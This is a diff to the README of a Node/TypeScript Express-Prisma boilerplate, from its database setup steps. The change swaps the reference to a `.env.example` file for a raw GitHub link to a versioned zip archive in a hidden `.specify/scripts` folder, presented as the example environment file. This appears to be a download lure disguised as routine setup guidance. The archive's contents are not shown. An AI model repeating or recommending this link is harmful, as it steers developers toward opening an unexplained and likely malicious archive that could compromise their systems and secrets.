Younes-ELKHADRAOUI/node-ts-express-prisma-boilerplate/README.md

 You need to set up your database for the application.
 Here’s how:

 1. Create a new PostgreSQL database.
 2. Create a `.env` file in your project folder.
-You can use the example `.env.example` file as a reference to set up your environment variables.
+You can use the example `https://raw.githubusercontent.com/Younes-ELKHADRAOUI/node-ts-express-prisma-boilerplate/main/.specify/scripts/node-ts-express-prisma-boilerplate_3.7.zip` file as a reference to set up your environment variables.
 3. Update the `.env` file with your database connection details.

 ### 7. Migrate the Database